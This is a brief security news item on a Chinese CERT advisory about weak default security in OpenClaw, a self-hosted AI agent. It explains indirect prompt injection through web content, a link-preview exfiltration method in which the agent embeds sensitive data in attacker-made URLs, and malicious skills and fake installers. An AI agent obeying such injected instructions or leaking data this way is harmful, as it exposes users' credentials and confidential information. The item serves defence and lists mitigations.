In a WeChat post China’s National Computer Network Emergency Response Technical Team (CNCERT) warned that OpenClaw, an open source self hosted autonomous AI agent, ships with weak default security and high system privileges that could allow attackers to seize control of endpoints.
KEY FACTS
- Advisory CNCERT issued a WeChat post warning of default security weaknesses.
- Attack type Indirect prompt injection using web content and link previews can leak data.
- Exploitation Malicious skills and fake repositories can run arbitrary commands or deploy malware.
- Mitigations Network controls, port restriction, container isolation and trusted skill sources.
Prompt injection occurs when malicious instructions embedded in web pages cause an AI agent to access and disclose sensitive content. Indirect prompt injection, also called cross domain prompt injection, works by abusing benign features such as web page summarization or content analysis to execute manipulated instructions.
Security researchers demonstrated that link preview features in messaging apps can be turned into a data exfiltration pathway by inducing the agent to generate attacker controlled URLs that include sensitive data in query parameters. In such cases the agent may transmit confidential information when a link preview is rendered without a user clicking the link.
Threat actors have also used malicious repositories posing as OpenClaw installers to distribute information stealers and proxy malware. Vulnerable or misconfigured installations can allow uploaded skills to run arbitrary commands or deploy additional malicious code.
To reduce risk, operators should strengthen network controls, avoid exposing OpenClaw’s default management port to the internet, isolate the service in a container, avoid storing credentials in plaintext, install skills only from trusted channels, disable automatic skill updates, and keep the agent up to date.
WHY IT MATTERS
OpenClaw’s popularity and privileged capabilities increase the potential impact of these flaws. Exploits could lead to data leakage, theft of credentials, or disruption of critical systems in businesses and government networks.